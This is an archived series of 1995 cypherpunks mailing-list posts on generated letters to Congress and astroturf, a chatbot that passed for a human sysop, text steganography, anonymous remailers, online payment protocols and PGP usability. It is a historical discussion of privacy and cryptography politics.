-There could be "agent" wars, but they will not be of consequence.

  In the beginning, the politicos may wish to commission software 
enhancements and intelligence gathering to enable mail scanning agents to 
filter out email generated by letter renderers.  Developers of the analysis 
software may try to find vocabulary and phraseology patterns with which to 
arm the analysis agents to toss rendered letters aside.  

  In the end, though, this will be a losing battle and a counterproductive 
one.  If 50 million rendered letters come in from 50 million real voters, 
they had better *not* be ignored or 50 million voters will take vengeance at 
the polls.  An expression of opinion is an expression of opinion, and the 
sophistication of the tools employed to generate them will be able to stay 
ahead of the technology for detecting them in any case.

-Interaction with Congress may ultimately take the form of battling proxies.

  On the one side are arrayed the forces of the A party, the shining letter 
rendering algorithms, vocab lists, grammar rules, and the latest in provably 
accurate slang and misuse of the language.  On the other side, the forces of 
the B party, with essentially similar tools.  In the middle is Congress, 
gleaming mail analyzers polished and ready.  

  Strangest of all is that all the effort of rendering and analyzing letters 
will go into the creation and consumption of communication particles that may 
eventually never be seen by "author" *or* "recipient."  The electorate will 
express itself by proxy and the elected officials will divine the political 
winds by proxy.  Voters will be hard-sold to sign up for ongoing personally 
authorized letter rendering, so they can go fishing.  Congresscritters will 
be assured that the analyzers will figure out which way the winds are 
blowing, so they can go fishing.  May the best proxy win.  

  Maybe voter and congresscritter will meet somewhere, fishing, and actually 
*communicate*.  Perish the thought!

>>Another factor that would make it appear more authentic would be spelling
>>and grammar errors.  The grammar errors could be built into the rant
>>generators...

There has been a BBS "door" available for several years that does this 
convincingly... if you're a sysop and run a "sysop chat" door but want to 
play mind games when you're not available, SHAMPAGE will answer the user's 
request to page the sysop and chat with him or her.  It is configurable to 
recognize keywords and make random selections from lists of responses to 
those keywords.  It converses believably as if it were a somewhat distracted, 
tired and disjoint human being.

I saw a log of a SHAMPAGE session in which a caller never realized he was 
conversing with a robot.  It kept calling attention to the late hour and 
the caller kept apologizing for the intrusion and asking for a file he 
needed.  As luck would have it, the random utterings and random 
selections of responses to keywords were often right on the mark.  Too weird! 
After several hundred lines of chat the caller finally gathered that the 
"sysop" was really pissed at being kept up so late and logged off, somewhat 
offended himself.  

SHAMPAGE typed in real time, with humanlike varying inter-keystroke timing, 
and makes "typos."  It "noticed" its mistakes a few keystrokes later and 
backspaced to correct them.  It typed "hte" instead of "the" and "ign" 
instead of "ing."  It was a riot.  With some enhancement it would be 
completely believable even to the forewarned caller.

I've also seen an incomplete attempt to bring the ELIZA concept up to date 
and implement it as a BBS door.  Though it typed line-at-a-time like a BBS 
teleconference, it still managed to confuse callers into thinking it was a 
real person by simple tricks of inverting pronouns and such.  It, like the 
chat door, seemed to be uncanny at randomly choosing just the right thing to 
say to cinch the caller's presumption that it was a human being.

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Wed, 19 Jul 95 01:39:17 PDT
To: wd803@freenet.victoria.bc.ca (Jonathon Blake)
Subject: Re: Automatic Rant generator
In-Reply-To: <Pine.2.2.9507182108.A29780@vifa1>
Message-ID: <199507190837.BAA21204@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Jonathan Blake wrote:
> 
>     Actually, True Type fonts of your handwriting are available, 
>     for any platform that accepts that font type.  I don't have 
>     the URL for them, but there is a pointer to it at 
>     HTTP://www.ntu.ac.sg/~tjlow/gclub.html

    The URL itself is:
    Turning Personal handwriting into TrueTypeFont
    (http://execpc.com/~adw/). 
    It includes an interesting .gif file of the producer's handiwork,
    but alas such a font costs $99.

> 
>     Using it would play hell for handwriting analysts, though.  
>     And if it was programmed to change the pen pressure as well 
>     --- the possibilities are staggering.  Can a pen plotter 
>     change pressure?
> 
    Uh, no one can't change pen pressure, but I think it can be
    mimicked.  If the effect one seeks of changing pen pressure is
    to vary the line width or ink deposited onto the paper then
    varying speed, and/or overwriting with or without offset can
    achieve interesting effects.  If I recall correctly, the HP
    pen position is addressable to 0.001" resolution, (though not
    accuracy.)  I recall creating some nice effects with multiple
    pen colors offset by a few mils in x and y.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Wed, 19 Jul 95 00:49:06 PDT
To: cypherpunks@toad.com
Subject: RE: Stego-Rants ?
Message-ID: <Chameleon.4.01.2.950719024816.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain




Which of the following is the cleartext?
----------------------------------------

1. Bit and byte dropout can significantly impede communication.

2. Flower and shrub planting can greatly enhance landscaping.

3. Word and phrase substitution can hopelessly disguise meaning.

4. UFO and space-alien belief can seriously damage credibility.


If you *presume* my context, you easily identify (3).  If only the wordlists 
that translate between (1), (2) and (4) were available for your inspection, 
you would be up the creek but you wouldn't know it.

Yes, this is aba's "exxon" at work again, and yes, it seems to me that 
deniability through other-plausible-meaning is viable as a form of stego.  
Grammatical correctness is easy to maintain, and care in choosing words can 
preserve much apparent meaning.

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 18 Jul 95 23:29:33 PDT
To: cypherpunks@toad.com
Subject: Stego-Rants ?
Message-ID: <Pine.3.89.9507190119.A4722-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a few thoughts:

1. Use the randomness in a computer generated piece of English text to 
hold your real message, encrypted, and obscured.

2. Even more entertaining would be if the foreground text could somehow 
be contrived to be meaningful. I know this would be a "good trick" but 
I'd conjecture that it's possible.  Imagine fractal compression of a text 
file, with the decompression routine adding some "randomness" which would 
be your message, obscured at a very abstract level.  Depending on how 
much "randomness" was added, I'm wondering if the resulting text might 
possibly retain some of its original legibility (?)  I am assuming that 
a companion fractal re-compressing routine would be required to retrieve 
the cypher.

(I am looking at an ad for a graphics program, "Images Incorporated" by 
Iterated Systems which with fractal techniques can achieve 100:1 
compression -- and then -- decompress to 8 times the original bitmap size 
with minimal added distortion.)

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 19 Jul 95 02:59:32 PDT
To: Michael@umlaw.demon.co.uk
Subject: Re: Root Causes Roots cont.
Message-ID: <199507190957.FAA45561@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Professor Froomkin writes:

<snip>

>I always understood "writing code" as in "cypherpuks write code" 
>to mean computer code, that is FORTRAN, C++, assembler, perl or 
>whatever.  I understand "writing IN code" to be the use of 
>cryptographic tools such as codes or cyphers.  

Sorry I misunderstood you, professor. I had always heard those "computer
codes" you mention referred to as "computer languages," and I thought
of "code" as refering to use of cryptography software like Nautilus or 
(of course) PGP. A quick skim of your interesting article reveals that 
this "code" vs. "language" terminology nitpicking is no-doubt as important
to you as it is to me, as we both know that's where legal and political
debates are won and lost. I freely admit my "excess of libertarian 
paranoia," [though I prefer to term my feelings "healthy respect for
world history"]. 

NOTE: I have always been computer-and-math-impaired compared to others
who have been on this list much longer, so I'm *certainly* no final 
authority as to what stuff should be called.

A later post indicates the professor's interesting article is at:

www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

>Thus my claim 
>that the right to write IN code may have existed in the 1790s, 
>but the right to write [computer] code could not (since there 
>were no computers).   

Or alternating current [thank you, Mr. Tesla]. The founders anticipated
inventions such as both of these in Article 1, Section 8.

>Of course, I could be wrong about this, 
>since however you define it, it's debateable whether I'd pass the
>code test to qualify as a cypherpunk, since I stopped writing 
>code when I gave up programming for lawyering, and I didn't start 
>writing in code when I started writing about codes.

I'd certainly flunk *any* C-punk test, unless it involves just 
writing IN code by using PGP for both encryption and authentication,
or the warm feeling I get in my heart for Phil Zimmermann.

>
>In any case it's a matter of definitions, not timelines.
>
>Note: I am not suggesting that the right to write code lacks 
>constitutional protection; just that the protection wouldn't 
>come from the 9th amendment.  

Agreed. As my earlier post (sadly) admitted, the 9th is *NOT* in vogue
these days. I also said that since the 9th is so universally ignored,
it just clutters-up the rest of the Bill of Rights and [perhaps] it 
therefore should be repealed. The people who say, "The 9th Amendment 
means nothing," or "it has no teeth," seem to be the same folks most 
reluctant to even *discuss* repeal, perhaps because discussion would 
inevitably bring publicity to those of us who support a 9th Amendment
*with* _plenty_ of teeth. 

For _much_ better "forgotten 9th" scholarship than my random thoughts
on this list, I suggest the kind and cooperative "market liberal" folks
at the suddenly-influential CATO Institute, located at URL:

http://www.cato.org/main/

<snip>
JMR
Regards, Jim Ray

"It is dangerous to be right when the government is wrong." Voltaire


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMAxxpG1lp8bpvW01AQG4TwP7BDhULQdsfbruwK59t+0s7NtkIZDfARl6
boKTQ1qbO8hQkEQJ+8d0L9p2RHmDlbS/MEwEY68sLRUT1MiP2ybT9UcHK/TPbial
aOVLZLprWqVW2sAL+gx7A3JPsGYdY/s8ZVllsX1xxH52btoaish890OOG/3e7v7r
afHBEWfP6k4=
=3F7U
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 19 Jul 95 04:28:21 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD747E.00030001AC.uuout@famend.com>
Message-ID: <9507191128.AA18103@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:
> PE> would be discerned by a staffer in moments. Crap like this is called
> 
>   They should know, because they send form letters to constituents all
> the time, only they don't bother to vary it a bit.

Misdirection. This has nothing to do with my point. The staffers will
STILL toss your stuff.

> PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> 
>   Meanwhile, back at the ranch.

In other words, you are choosing to ignore me. Regardless of whether
you are paying attentoion, however, you will still not be able to
alter the facts of life in Washington.

> .. If one of our DC members can set up an
> Imail-FAX gateway, we can publicize some nifty Iddresses for folx to

Perhaps people who can be bothered to spell out "folks" properly also
are willing to write letters that will be paid attention to. As you
seem to prefer to ignore the fact that you will be ignored, why are
you willing to spend effort setting up an "Imail[sic]-FAX gateway"?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 19 Jul 95 04:51:23 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <9507191128.AA18103@snark.imsi.com>
Message-ID: <Pine.SOL.3.91.950719074121.5161G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW:

The Christian Science Monitor ran an article a week or so ago, reporting
that Congressional mail loads have doubled in the last three years, that 
it's inconvenient to deal with all that mail, and nobody is paying any 
attention to their mail any more.

I've never had a meaningful response from any of my (non-) representatives.

Representative government, hah!

bd

On Wed, 19 Jul 1995, Perry E. Metzger wrote:

> 
> MONTY HARDER writes:
> > PE> would be discerned by a staffer in moments. Crap like this is called
> > 
> >   They should know, because they send form letters to constituents all
> > the time, only they don't bother to vary it a bit.
> 
> Misdirection. This has nothing to do with my point. The staffers will
> STILL toss your stuff.
> 
> > PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts.
> > 
> >   Meanwhile, back at the ranch.
> 
> In other words, you are choosing to ignore me. Regardless of whether
> you are paying attentoion, however, you will still not be able to
> alter the facts of life in Washington.
> 
> > .. If one of our DC members can set up an
> > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to
> 
> Perhaps people who can be bothered to spell out "folks" properly also
> are willing to write letters that will be paid attention to. As you
> seem to prefer to ignore the fact that you will be ignored, why are
> you willing to spend effort setting up an "Imail[sic]-FAX gateway"?
> 
> .pm
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 19 Jul 95 04:58:10 PDT
To: cypherpunks@toad.com
Subject: Re: Automatic Rant generator
Message-ID: <199507191158.HAA20377@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




Jonathon Blake <wd803@freenet.victoria.bc.ca> writes:

[ Various words of Tim May, Martin Hamilton, Monty Harder, Harry
  Bartholomew, and myself elided. ]

[ Re: plotters and Metafonts: ]
>
>    Making the little problem Tim presents, a major headache for 
>    somebody else --- handwriting analysts.
>...
>    Actually, True Type fonts of your handwriting are available, 
>    for any platform that accepts that font type.
>

It needs to be more complicated than this, however, because if just a
font is used then each 'e' looks like every other--easy to detect.

>    Tim May > Of course this is also similar to the "style
>    Tim May > detectors" we so  often talk about.
>
>    I don't remember the program name, but there is software 
>    available now, that analyzes a document, and figures out who 
>    wrote it --- based on the frequency count of the letters of 
>    the alphabet.  Secondary measures are frequency counts of 
>    letter pairs.  Words, phrases, sentences etc are totally 
>    ignored.  So what you'd need to do here, to pass your pseudo- 
>    Turing Test is a program that generates different statistical 
>    results, for allegedly different people.   

Interesting.  I've not heard of this.  The situation bears a great
similarity to stego--you need to emulate a statistical pattern to
make it undetectable, and if your opponents statistics are more
sophisticated than yours, you'll be found out.

[ Re: Introducing simulated spelling and typographical errors: ]
>
>    Actually, the usual give away, is in letter and letter pair 
>    frequencies --- not spelling mistakes, grammatical errors, 
>    etc.
>
>    However, there a technique called _Scientific Content 
>    ANalysis_ that looks at how things are said, to judge their 
>    "truthfulness."  A good program will not show that the text 
>    was randomly generated, nor show that the author is off-the- 
>    wall, so to speak.

Then again, what are the chances that Congressional staffers will be
using such sophisticated methods to sort out the 'astroturf'?  If
a staffer is suspicious but then sees "recieved" and "I been" and
"heplful" and decides, "Okay, this was written by a human," well,
that's Good Enough for Government Work, as they say.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Wed, 19 Jul 95 06:16:28 PDT
To: cypherpunks@toad.com
Subject: RE: Stego-Rants ?
Message-ID: <9507191316.AA14859@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Which of the following is the cleartext?
> 1. Bit and byte dropout can significantly impede communication.
> 2. Flower and shrub planting can greatly enhance landscaping.
> 3. Word and phrase substitution can hopelessly disguise meaning.
> 4. UFO and space-alien belief can seriously damage credibility.
> If you *presume* my context, you easily identify (3).  If only the wordlists 
> that translate between (1), (2) and (4) were available for your inspection, 
> you would be up the creek but you wouldn't know it.
> Yes, this is aba's "exxon" at work again, and yes, it seems to me that 
> deniability through other-plausible-meaning is viable as a form of stego.  
> Grammatical correctness is easy to maintain, and care in choosing words can 
> preserve much apparent meaning.
> Bolivar

This class of code is fairly old. In 'The Codebreakers' an incident 
is recounted (I think from WW2). A suspected spy in the US was sent
a cable from overseas, reading 'Our father is dead'. This was 
intercepted, and the censors, suspecting a stego'd message, 
substituted 'Our father is deceased'.

The suspected spy immediatly sent back 'Is father dead or deceased?', 
and was arrested. 

The book contains many fascinating stories of stego and attempted 
stego, including mailed knitting patterns, crossword puzzles, 
drawings, sports statistics, etc.

On the eve of Pearl Harbour, the wife of a Japanese diplomat in Oahu
sent a long message to Japan describing in detail the many kinds of
flowers blooming at that time in Hawaii. It was sent through 
non-diplomatic channels, and authorities suspecting it contained 
stego, failed to deliver it. After the war it came out that she did
regular gardening columns for a Japanese magazine, and the message 
was entirely innocent.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 09:14:53 PDT
To: "Douglas B. Renner" <cypherpunks@toad.com
Subject: Re: Stego-Rants ?
Message-ID: <ac327d250c021004491e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:57 AM 7/19/95, Douglas B. Renner wrote:
>Just a few thoughts:
>
>1. Use the randomness in a computer generated piece of English text to
>hold your real message, encrypted, and obscured.
>
>2. Even more entertaining would be if the foreground text could somehow
>be contrived to be meaningful. I know this would be a "good trick" but
>I'd conjecture that it's possible.  Imagine fractal compression of a text
>file, with the decompression routine adding some "randomness" which would
>be your message, obscured at a very abstract level.  Depending on how
>much "randomness" was added, I'm wondering if the resulting text might
>possibly retain some of its original legibility (?)  I am assuming that
>a companion fractal re-compressing routine would be required to retrieve
>the cypher.
>
>(I am looking at an ad for a graphics program, "Images Incorporated" by
>Iterated Systems which with fractal techniques can achieve 100:1
>compression -- and then -- decompress to 8 times the original bitmap size
>with minimal added distortion.)

But fractal compression schemes are usually _lossy_, that is, some of the
original bits are irretrievably lost. (This should be clear also from the
amount of compression achieved....multiple files/images compress to the
"same" smaller file--by the "pigeonhold principle.")

Lossy compression is often OK for visual images and audible files, a la
music, but would be pretty bad for any scheme dependent on encryption.

(Not totally out of the question, as error correction could be used to
maybe  construct the critical bits, but then there's a messy battle going
on between lossy compresssion to get more bit density and adding bits for
error correction...)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 19 Jul 95 07:25:22 PDT
To: cypherpunks@toad.com
Subject: Secure Courier and Amex Card
Message-ID: <199507191425.JAA14052@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




   Mountain View, Ca., July 18 -- With the support of Intuit
   and MasterCard International, Netscape Communications has
   announced Secure Courier, an open, cross-platform digital
   envelope. The new protocol allows secure transfer of credit
   card, debit card and micro-transactions across the
   Internet.

   Secure Courier is an open, cross-platform protocol, meaning
   it will operate in Macintosh, Windows, and Unix operating
   environments common to Internet traffic. Specifications for
   this new protocol are currently available from Netscape's
   World Wide Web site at

      http://home.netscape.com/newsref/std/credit.html .

   _________________________________________________________


   New York, NY, July 18 -- American Express' Travel Related
   Services Company said it is establishing relationships with
   four technology companies for secure Internet credit card
   transactions using the American Express card and the Optima
   card.

   The four companies involved, CyberCash, First Virtual
   Holdings, Netscape Communications Corporation, and Open
   Market, have different ways of securing transactions over
   The Internet's World Wide Web.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 19 Jul 95 06:57:47 PDT
To: cypherpunks@toad.com
Subject: Re:       RE: Stego-Rants ?
Message-ID: <9507191352.AA20325@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Peter Trei" <trei@toad.com>
> The book contains many fascinating stories of stego and attempted 
> stego, including mailed knitting patterns ...

It was the best of times, it was the worst of times.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 19 Jul 95 10:04:39 PDT
To: cypherpunks@toad.com
Subject: cypherpunk "Zen" victories
Message-ID: <199507191703.KAA20332@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was recently marvelling at how much the "cypherpunk agenda"
is being advanced even in light of what would seem to be setbacks.
Particularly in the area of anonymous remailers. We now have a very
major article on remailers and Julf's setup in the NYT that portrays
them in an unbiased, unhysteria-stricken mode. Also in the article,
it quotes the police as regretting their falling victim to
Scientology manipulation and investigating the remailer "without
cause". A major officer is quoted as saying, roughly, "we are
going to need a crime before we investigate in the future". 

Look what we got out of this: 

1) incredible positive publicity for Julf,
Hero of the Net 

2) introduction of the concept of anonymous remailers
to the layman 

3) police awareness. increased reluctance to go on anonymous remailer
witchhunts. advice to other police to do the same.

4) only *one* address was compromised on Julf's system. a small price
to pay for all this

5) Time Magazine also did an article on Julf a few months ago and
this compromise in identity. *astonishing* publicity.

All in all, I would say the effect was an overall "net positive".
It reminds me of a zen-like saying, "sometimes you lose by winning
and win by losing". It would seem on the face of it that  the
Helsingius Affair was a debacle from the point of view  of pseudonymity.
However I would consider it a extraordinary success. 

The major foes of pseudonymity have so far been misguided police forces 
in Finland, who now say they resent the solicitude of the US into their own
affairs, and would not be so eager to cooperate in the future;
another foe is a radical religious cult that is finding its own
set of 20th century heretics, and attempting to excommunicate them.
In the meantime, with each exposure, the idea of anonymity and
pseudonymity is gaining powerful friends.

Also, a long time ago a major foe of anonymity was Dick Depew. An
article came out on him in the WSJ that made him look awfully
silly.  He is roundly considered one of the more legendary net
crackpots today. 

===

I'd also like to point out that the recent Rimm job affair is
another "net positive" for the net. Rimm has been so utterly
thoroughly discredited and blackened by his own personality
and background, as reported by Brock Meeks recently, it is 
amazingly hilarious. Rimm has become the laughingstock of
cyberspace in the way that Cantor and Siegal were

We could not have asked for a better setup for embarrassing
and humiliating the media into realizing the core issues
involving pornography on the internet. If someone did this
intentionally, it would have been considered a brilliant
trap. Time and DeWitt have been savaged by very reputable people, and 
I'm sure they consider the article a fiasco from a credibility standpoint.
Any magazine that covers pornography in cyberspace in the future
will be very gunshy and will not be so flippant, if they can
stand poking the hornet's nest at all.

===

Another area is in the bills that are being introduced in congress.
It would seem these are a fiasco from the point of view of
those interested in cyberspace. But there are backlashes even
in congress. Was it Markey that introduced a bill that made
cyberspace off limits to future draconian legislation? All this
also forces legislators to figure out what the hell they are dealing
with, and they are finding out what their own authority in the 
matter is. I think the wise ones may figure out that if they
don't play nice, we may take our marbles away and go play with
someone else. D.Frissell said something profound in his letter
to the editor, "Congress thinks the Internet can be controlled.
We who built it, and continue to build it, think it cannot be.
It will be interesting to see who is right". His comparing it
with the ideas in the declaration of independence, that "when
a government no longer serves the people, they have a right to
overthrow it", is extremely apropos in cyberspace, where it
may be more possible than ever for those who desire freedom
to make those who are apposed to it, completely irrelevant.

T.May suggest that we just give up the fight in congress, saying
that bills can be introduced faster than we can fight them. I
agree with the observation but not the conclusion. 
Bills have a very hard time getting to be law.
They are very fragile in initial stages, and at these points they
can indeed be killed with a little pressure in the right spots.
We are learning where those spots are.

At this point I think it is not in the interests of those promoting
cyberspace to try to evade congress. So far, it has not proved itself
to be completely hostile to the point of trying to shut down cyberspace
to the degree it does not fit its own agenda. And as long as they
are not outright enemies, some could be turned into powerful
promoters. The idea of abandoning educating/influencing congress 
entirely seems like a kind of unhealthy nihilism to me. There are
allies in congress and there are people listening there. Their 
unawareness seems amazingly proportional to the cluelessness of
the general population about cyberspace (and I see extremely
encouraging signs both are rapidly diminishing).

The bills seem to becoming more desperate and draconian in their
language. This is a sign of fear and dread on the side that seeks
to regulate bits. They are in a tricky position, because the more
draconian the language, the less likely it is to be passed and
taken seriously. People become suspicious and hypersensitive to
the infractions. To a large degree, many parts in the government
only gain their power through secrecy. As people become more aware
of the power flow, they disrupt and seize it themselves. Every bill
that has more desperate language is the other side revealing
their secret agenda, to control thought, which I think reasonable 
people are increasingly considering and recognizing as bogus
and bankrupt.

Congress will eventually polarize into being generally promoting
of cyberspace, or outrightly hostile to it. Cyberspace will
inevitably escape its grip if congress goes in this direction. To use
Zen analogies again, there is the idea that water is the most
powerful force on the earth, because it simply flows around
that which opposes it. I find that cyberspace is wholly analogous.
In fact it seems to me that cyberspace would give Lao Tzu
a whole new cuttingly apt metaphor for his philosophies!!

===

So the next time that you rant about how some bill or another
means the Death of the Net, or the police investigating a remailer
means the downfall of cryptoanarchy, or a lousy article with a
zillion distortions comes out, think again. The greatest cypherpunk
victories are emerging through what would appear at first to be the 
"blackest" moments.

viva la cryptoanarchy!!!


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 19 Jul 95 07:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: Commercenet document on cryptography
Message-ID: <9507191417.AA20396@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>   http://www.commerce.net/information/position/position.062695.html

Thanks to Steven for mentioning this -- it's a great paper.  Send it to
your gov't representatives.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Wed, 19 Jul 95 11:02:15 PDT
To: cypherpunks@toad.com
Subject: Government Mandated Keys
Message-ID: <9507191802.AA21406@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I want to register the 1-bit key of "1".  I expect to 
send about half my message bits encrypted, the rest will be 
clear-text.
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 19 Jul 95 11:37:46 PDT
To: cypherpunks@toad.com
Subject: Re: Government Mandated Keys
Message-ID: <199507191836.LAA18289@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 7/19/95 PDT, rick hoselton wrote:
>I want to register the 1-bit key of "1".  I expect to 
>send about half my message bits encrypted, the rest will be clear-text.

Oh, go ahead, register 0 also.  You'll probably want to switch keys
occasionally during sessions.
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 19 Jul 95 10:44:59 PDT
To: cypherpunks@toad.com
Subject: "Hey Phil!  Stop telling people *not* to use PGP!"  (plus: "help me with my PGP problems!")
Message-ID: <199507191744.LAA04117@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[I posted the following to alt.security.pgp and sci.crypt.  -Bryce]


(If you don't want to help with my problems, skip to "Zimmermann needs to 
change pgpdoc1.txt" at the end.)


First, I am trying to communicate with a fellow who refuses to upgrade to
PGP2.6 because if RSA (as opposed to RSAREF) was good enough for Phil
then it's good enough for him!  Assuming for the moment that convincing
him to upgrade is not feasible, isn't there a hack by which I can interoperate
with him?  He's using 2.3a and I'm using 2.6ui, 2.6.2, 2.6.1 and 2.6.
(More on that later...)
  I can hack the C code if that is what is necessary to interoperate.


Second, I am using several public keys and several different versions of
PGP because I work from various computers with various levels of security.
That is: when I am in the University's computer lab I use one key <617C6DB9>
and the University's 2.6.2 but when I am on my home computer I use another
<148A11E5> and my linux PGP 2.6.1 (I'm going to upgrade it any day now...).
I also have a couple of other keys with "Bryce Wilcox" in the User ID field
for other uses.
  The problem/gripe is that whenever I try to manipulate public keys on
my keyring, PGP grabs the first one with User ID "Bryce".  How do I extract,
edit, sign, etc. the *other* "Bryce" keys on my public keyring.  I tried
giving PGP the Key ID, which seemed like the most reasonable user interface
to me, but that didn't work.


Third, how do I set those "PGP-Note" strings that appear in some people's
PGP Signature Blocks?



And lastly, a gripe.  Zimmermann's "pgpdoc1.txt" needs to be changed.

Let me explain:  I am in the (long, drawn-out) process of trying to convince
my friends and family members to use PGP.  The first hurdle is that it is
a pain in the butt to use, and they are not going to use it if it means they
have to learn a handful of Unix commands and spend 30 seconds screwing with
it every time they want to send mail.  But that isn't the subject of this
gripe.

  The second hurdle manifests when I send them a copy of "pgpdoc1.txt".  They
start browsing through it and come upon "NEVER EVER use PGP on a remote,
multi-user system.  It wouldn't have maximum security in that situation."
  They say "Oh, well I guess I can't use it then because damned if I'm going
to upload and download all of my mail at 1200 baud just so Bryce will quit 
bugging me about this PGP thing."
  So I say "No no no, using it on a remote system is still better than
nothing.  Just be aware that it is easier to crack your secret key when
you use it there than if you kept it on your home computer."

  So they go back to reading "pgpdoc1.txt" and it says "NEVER EVER use a
public key which was sent to you through the Net.  It could be tampered with."
  So they say, "What, I have to make a long-distance phone call to Cousin Joe
in Israel before I can send him a 'Happy Birthday' message using PGP?  Why
bother?"
  And I say "No no no, using a key which you got through the Net is better 
than using no key at all, just be aware that if someone *really* wanted
to spy on you that they could have tampered with it.  When you see Cousin
Joe next Christmas you can compare keys with him and make sure you have the
right one."

In short, pgpdoc1.txt needs to quit saying "NEVER EVER use PGP in other than
MAXIMAL SECURITY situations" and start saying "If you want MAXIMAL security,
do it this way, and if you are satisfied with lesser security, here are
other options."



I am fond of saying that we PGP enthusiasts have two choices ahead of us
within a couple of years:  either 5,000 enthusiasts using PGP with
MAXIMAL SECURITY at all times, or 5,000 enthusiasts with MAXIMAL
SECURITY and 10,000,000 computer-illiterate e-mail users using PGP with
push-button interfaces and multi-user remote systems.


The important thing, of course, is the easy-to-use, e-mail-integrated
software (version 3.0, I hope?), but it would also help if Zimmermann's
PGP Doc didn't tell those computer-illiterates to either "become enthusiasts
or don't use it."


Bryce
signatures follow

    /=============------------             URL of the Day:  DigiCash bv
     Bryce Wilcox,  Programmer       The currency of the future!  Give me a
     bryce.wilcox@colorado.edu       cyberbuck because I gave you this URL:
     ------------=============/              http://www.digicash.com/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMA1EKPWZSllhfG25AQHzPAP+MB/JLhN+Un9yVXRv5fejb297YONynlPF
EXxN6L7OwcD4q9XE23XdlutlQbAoK2tKbBLjTYat7s/t53W+jpCyKOChN7zn4V+I
